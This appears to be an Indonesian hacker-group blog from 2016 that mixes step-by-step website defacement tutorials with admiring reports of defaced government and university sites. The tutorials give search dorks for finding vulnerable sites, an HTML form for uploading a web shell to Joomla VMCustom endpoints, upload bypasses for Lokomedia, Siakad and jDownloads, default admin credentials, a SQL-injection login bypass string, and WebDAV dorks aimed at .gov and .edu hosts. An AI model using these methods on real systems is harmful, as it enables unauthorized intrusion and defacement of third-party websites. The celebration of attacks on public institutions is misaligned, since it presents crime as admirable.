Senin, 30 Mei 2016

Joomla Plugins VMCOSTUM Arbitrary File Upload





  Assalamualakum Mas Mbah :D

 Sekarang sya akan memberikan Tutorial "Joomla Plugins VMCOSTUM Arbitrary  File Upload"

Sebenarnya sya dapat tutor ini cuman jalan jalan ke blog orang sih :v

Klau gitu langsung aja baca artikel di bwah ini yah mas mbah :D .


  Dork : inurl:/plugins/vmcustom/

Masukkan dork diatas menggunakan mesin pencarian bukan mesin ketik yah :D

klau udah pilih salah satu web masukkan exploitnya kyak di bwah ini

"site.com/path/plugins/vmcustom/photoupload/assets/server/php/"

tanda vulnerable webnya kyak gini mas mbah


Klau Sudah kyak gitu sisa upload shellmu dengan menggunakan csrf di bwah


<center>
<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
<font face="Iceland" color="red" size="7">jQuery File Upload</font>
<form method="POST" action="TARGET.com/path/"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form><br>

Yang berwarna biru ganti dengan web vuln target yg sudah di dapat .

save dengan extensi .html mas mbah :D .

File yg bsa di upload cuman yg berextensi : PHP,HTML,JPG,PNG,JPEG,GIF .

Klau sudah di upload panggil shellnya disini

"www.site.com/tmp/shellberbentukrandom.php"

Atau

"www.site.com/tmp/nx_d5cc371096f4e5516bf0ea7b10707d68/0/Shellmu.php"

   Mudahkan Sisa praktekin dan tetap santai yah :D

Klau Kurang mengerti atau kurang vaham sisa isi kolom komentar yah :D

Exploit Author : AnoaGhost

Source Images : https://shirotenshii.blogspot.co.id/

Thanks To : PhantomGhost - Sulawesi IT Sec

Sabtu, 28 Mei 2016

Situs Institut Pertanian Bogor Diretas



   Kasus peretasan Semakin Merajalela . Kali ini situs Institut Pertanian Bogor yang jadi korban. Peretas yang yang nama teamnya "PhantomGhost" menambahkan file " -.html " di root path domain IPB.




Seperti gambar diatas Ini , Sampai sekarang file tersebut belum dihapus, menandakan celah nya belum ditutup oleh admin web IPB.
Mengenai motif peretasan sendiri kemungkinan hanya sekedar iseng . Terbukti tidak ada pesan khusus di script mereka . Hanya kata kata :


Hacking Not just a name..
Hacking Not a Crime.. Hacking Is ART.

Namun menurut mirror di zone-h.org , tanggal 26 April 2016, situs tersebut juga dibobol oleh peretas dengan kodenama Leohaxor404



Mirror nya bisa dilihat disini :
http://zone-h.org/mirror/id/26313317

LeoHaxor404 berasal dari tim yang sama yaitu PhantomGhost.

Yah semoga saja admin website IPB segera melakukan patching agar tidak ada lagi peretasan yang mungkin lebih parah seperti drop database dll.

Source : http://news.linuxsec.org/

Thanks To : All Member PhantomGhost Dan Sulawesi IT Sec


Bug Upload CMS Lokomedia Vulnerable



    Assalamualaikum ^_^

Lama udah nggak update , gmana kbarnya.? Mudah mudahan baik aja yah , Klau sakit pergi saja dulu bobo entar mati Siapa yg tanggung jwab :v .

Sekarang sya akan membagikan Tutor "Bug Upload CMS Lokomedia Vulnerable" Kepada para mastah :v Tapi Perhatikan Dengan Baik , Karena Bug Nya Agak Rumit -_- . 

Klau gitu langsung aja baca artikel di bwah :D .

Dork : allinurl:media.php?module=berita

Gunakan Dork diatas dengan menggunakan mesin pencarian :D .

Kemudian pilih salah satu target yg mau di hajar :v .

klau sudah dapat masuk dulu di halaman loginnya mas mbah .

biasanya halaman loginnya kyak gini : 

www.site.com/administrator/

atau 

www.site.com/adminweb/

atau

www.site.com/admin/

Klau udah msuk di halaman loginnya masukkan url ini "modul/mod_banner.php"

Contoh kyak gini nih

www.site.com/admin/modul/mod_banner.php





Kemudian klik icon Tambah Banner dan akan muncul Halaman Upload banner, jangan diapakan dahulu, sekarang kita copy semua html tersebut dengan cara CTRL + U dan simpan di Notepad. Didalam Source tersebut ada :


nanti ada di source code tersebut kyak gini ".aksi.php?module=banner&act=input"

Masukkan Source Code yg di atas di belakang url target kyak gini

www.site.com/admin/aksi.php?module=banner&act=input

Simpan dengan Nama apa saja terserah anda kehendaki dengan format .html, kemudian buka file tersebut dan isilah dengan backdoor yang anda miliki.

Klau mau lihat hasil upload shellnya disini mas mbah :D

www.site.com/admin/foto_berita/namashell.php

Mudahkan.? Sisa di praktekin nih mastah , dan jangan lupa Enjoy

Kalau Ada Kurang Vaham Atau Belum mengerti Isi Aja Kolom komentar , Atau Bisa Kunjungi Fanspage Kami "https://mobile.facebook.com/Mr3RR0R-1605930586394122/".

Waasalamualaikum ^_^



Thanks To : All Member PhantomGhost Dan Sulawesi IT Sec









Jumat, 20 Mei 2016

Situs Kementerian PPPA Diretas


   
     Situs Kementerian Pemberdayaan Perempuan dan Perlindungan Anak malam ini (23/3) kena retas. Saat dibuka pukul 20.40, situs http://www.kemenpppa.go.id/ tak bisa dibuka sama sekali dan justru muncul tulisan The PHANTOMGHOST dengan latar belakang gambar interior bangunan tua dan tengkorak, disertai animasi bintang-bintang dengan warna background hitam. Juga terdengar jelas lagu Jar of Heart yang dilantunkan Christina Perri.
Isi tulisan lengkapnya berbunyi, ”Anakmu bukan milikmu. Mereka putra putri sang Hidup yang rindu pada diri sendiri, Lewat engkau mereka lahir, namun tidak dari engkau, Mereka ada padamu, tapi bukan hakmu. Berikan mereka kasih sayangmu, tapi jangan sodorkan bentuk pikiranmu, Sebab mereka ada alam pikiran tersendiri. Patut kau berikan rumah untuk raganya, Tapi tidak untuk jiwanya, Sebab jiwa mereka adalah penghuni rumah masa depan, yang tiada dapat kau kunjungi meski dalam mimpi. Kau boleh berusaha menyerupai mereka, Namun jangan membuat mereka menyerupaimu Sebab kehidupan tidak pernah berjalan mundur, Pun tidak tenggelam di masa lampau. Kaulah busur, dan anak-anakmulah?Anak panah yang meluncur. Sang Pemanah Maha Tahu sasaran bidikan keabadian. Dia merentangmu dengan kekuasaan-Nya, Hingga anak panah itu melesat, jauh serta cepat. Meliuklah dengan suka cita dalam rentangan tangan Sang Pemanah, Sebab Dia mengasihi anak-anak panah yang melesat laksana kilat Sebagaimana pula dikasihiNya busur yang mantap..”.
Sementara di bawah tulisan tersebut tertera seperti identitas peretas yang bertuliskan: “we are : 4prili666h05T – VANKAS7IC – JackWho – Mr.Aljabar – Mr.3RR0R – gekikara404 – Mr.DeFroz – KidSZonk – Harith10”. Di bawahnya ada menu “contact” yang setelah diklik, ternyata menuju fanpage Facebook: Phantom Ghost.
Phantom Ghost FB

Sampai saat ini, belum ada keterangan resmi dari pihak Kementerian PPPA. Juga belum diketahui sejak kapan situs Kementerian PPPA tersebut diretas.
Hal yang sama pernah dialami situs Sekretariat Kabinet yang diretas 25 Desember 2015 lalu. Saat itu lamanhttp://www.setkab.go.id/ juga tak bisa diakses. Tampilan lamannya hanya muncul gambar tengkorak dan terdengar musik disko

Source : http://kastaranews.com/situs-kementerian-pppa-diretas/

Rabu, 11 Mei 2016

Default User Lokomedia Vulnerable




    Assalamualaikum ^_^


Sebelum sya memberitahukan Default User Lokomedia Vulnerable .
Klian hrus tau dulu apa itu cms lokomedia itu.?

lokomedia adalah CMS asli ciptaan indonesia , jdi klau ngerusakin tanggung jwab aja :D .

langsung aja cek di bwah tutornya mbah :

Dork : inurl:/adminweb site:id < kembangin lgi biar dapat bnyak

gunakan dork di atas yah di professor google .

klau udah dapat targetnya . gambarnya kyak gini




Masukkan user dan passwordnya di bwah ini

u : admin | p : admin

atau

u : wiro | p : sableng

atau

u : joko | p : sembung

Klau sukses nanti gambarnya kyak gini mas vro :v :




Selamat mas vro . itu tandanya sukses masuk ke hlaman adminnya :D

Gitu aja . Mudah kan .?? .

Silahkan di praktekin aja dan tetap enjoy :D

Waasalamualaikum


Thanks To : PhantomGhost

Fanspage : https://mobile.facebook.com/Mr3RR0R-1605930586394122/

Ikuti Jg Yah Faccebook Saya Dengan Mengklik bgian samping kanan atas "Ikuti"

Minggu, 08 Mei 2016

Tutorial Deface Dengan Siakad


  

   Assalamualaikum ^-^

Halo gan , gmana kabarnya..? , Sekarang lanjut yah ke tutor selanjutnya .

Langsung cek di Artikel di bwah .

Dork : inurl:"?mnux=" site:id

Masukkan Dork nya di pencarian google , kyak di iklan  TV OK Google  :v .

Pilih web yg mau di tebas yah  , nanti gambarnya kyak gini mas vro :D , Trus Pilih "Super user"


                     


Nanti kita di suruh masukkan user dan pass di webnya :3 , Masukan user dan pass ini : '=''or'


                    

Klau webnya kyak gini , berarti berhasil masuk jdi user , langsung aja masuk di menu "keuangan >> 02 File Biaya Mhsw" , trus isi data"




                     


Lalu klau udah sampe di tulisan "upload files" langsung aja upload shellmu gan , kyak gambar dbwah


                      

Klau mau panggil shellnya disini gan .

contoh : www.site.ac.id/tmpbank/namashellmu.php


OK Gitu aja gan , klau ada yg kurang vaham sisa isi komen di bwah yah ^_^

waasalamualaikum ^_^

Source and Thanks : http://selapancyber.blogspot.co.id/

Facebook : https://www.facebook.com/marselERROR

Kamis, 05 Mei 2016

Tutorial Deface Dengan Jdownloads




   Assalamualaikum ^_^

  Sekarang saya lagi mau bagi bagi tutor nih namanya "Tutorial Deface Dengan Jdownloads"

Langsung aja cek tutornya di bwah :


Dork : Powered By jDownloads ( kembangin lagi yah om :D )

Gunakan dork diatas dengan menggunakan google mastah :p

klau udah dapat contoh kyak gini :

www.site.com/

Ubah urlnya jdi kyak gini

www.site.com/index.php?option=com_jdownloads&Itemid=1&view=upload

atau


www.site.com/index.php?option=com_jdownloads&Itemid=1&task=upload


nanti klau vuln gambarnya kyak gini mas bro :D







langsung aja isi data datanya mas vro , yg tanda merah yg itu aja isi

klau mau upload shell , harus gunakan extensi .php.j , contoh : shellmu.php.j

klau udah submit tempat akses shellnya disini :

www.site.com/images/jdownloads/screenshots/shell.php.j


Ok Gitu aja om :v , langsung aja di praktekin  dan jgn lupa santai yah mas vro :v

klau ada yg kurang vaham tinggal isi komentar yg tersedia di bwah om :D

Waasalamualaikum ^-^


Source Images : http://www.idiot-attacker.com/

Thanks To : Allah Swt - PhantomGhost - Sulawesi IT Sec

Facebook : https://www.facebook.com/marselERROR


Selasa, 03 Mei 2016

Tutorial Deface Dengan Webdav




   Assalamualaikum bro dan bray ^-^

 Sekarang sya lgi share "Tutorial Deface Dengan Webdav" sebenarnya ini sih exploit lama dan mudah sih menurut sya .

 jdi buat para mastah yg udah pada tau exploit ini , jauh jauh aja dulu :( . biarkan para nubie berkreasi vro :v .

 Langsung aja baca artikelnya di bwah ini :D

Pertama download dulu software webdavnya di bwah.

Download Webdavnya Disini Vro

Setelah selesai di download webdavnya , langsung jalankan aplikasinya . tpi matikan antivirusnya dulu karena aplikasi ini di anggap virus oleh antivirus , tpi tenang vro itu bukan virus kok sumvah :v.

Kalau sudah di buka klik tulisan "Webdav" lalu klik lgi "Asp shell maker"





Klau udah itu vro lanjut klik "Settings" klik lgi "load shell from file ( masukkan script defacemu yg paling mantap :v ) , "name of your shell" "gunakan nama terserah asal akhir namanya .html


klau udah gan sisa masukin target nya di "Add site" :D , pake dork yg di bwah ini

  • inurl:Indonesia.txt Hmei7
  • inurl:/webdav intext:WebdavTestpage
  • intext:WebdavTestpage site:com
  • inurl:/webdav
  • intitle:”index.of” intext:”(Win32) DAV/2″
  • intitle:”index.of” intext:”(Win32) DAV/2″ intext:”Apache” site:edu
  • intitle:”index.of” intext:”(Win32) DAV/2″ intext:”Apache” site:gov
  • inurl:webdav
  • inurl:.com/*.asp
  • inurl:.edu/*.asp
  • inurl:.gov/*.asp
  • inurl:.net/*.asp
  • inurl:.org/*.asp

Mudah kan , langsung aja praktekin yah . selamat mencoba . Happy Enjoying vro :D .

klau ada yg kurang vaham sisa isi komen di bwah

waasalamualaikum ^-^

Facebook : https://www.facebook/marselERROR


Senin, 02 Mei 2016

Website Komisi Perlindungan Anak Indonesia (KPAI) Diretas




  Assalamualaikum ^_^

     Sekarang lagi heboh website Komisi Perlindungan Anak Indonesia (KPAI) diretas , website ini beralamatkan http://kpai.go.id/ , di kabarkan di retas oleh hacker yang bernama samaran Skeptix.



                                            tampilan situs komisi perlindungan anak indonesia yang di retas


website yang beralamatkan http://kpai.go.id/ pada tanggal 21/05/2016 , mengalami perubahan pada tampilan layar utama dengan tampilan latar hitam. 
  anggota hacker ini jg meninggalkan pesan yang bertuliskan "Zuhahaha.. You're drunk?Fix ur sec first b4 talking about game",yang kurang lebih berarti, perbaiki keamanan(sistem) anda dahulu sebelum berbicara tentang game

sampai saat ini belum ada kepastian tentang motif peretasan ini . namun ini pasti diduga sebagai protes tentang game online yang di blokir di indonesia .

Seperti kita ketahui,beberapa waktu yang lalu pemerintah sempat mengeluarkan pernyatan bahwa akan memblokir sejumlah gim daring (game online). Hal itu di perkuat oleh pernyatan Erlinda,Sekretaris Jenderal Komisi Perlindungan Anak Indonesia (KPAI) "Pemblokiran jadi salah satu cara paling membantu. Setidaknya, daripada tidak ada action sama sekali" kata Erlinda,di kutip dari republika.co.id(24/4/16).

keren juga yah hacker indonesia dalam menyigapi masalah ini . salut buat hacker indonesia . 

Wasaalamualaikum ^-^

Thanks To : PhantomGhost - Sulawesi IT Sec

Facebook : https://www.facebook.com/marselERROR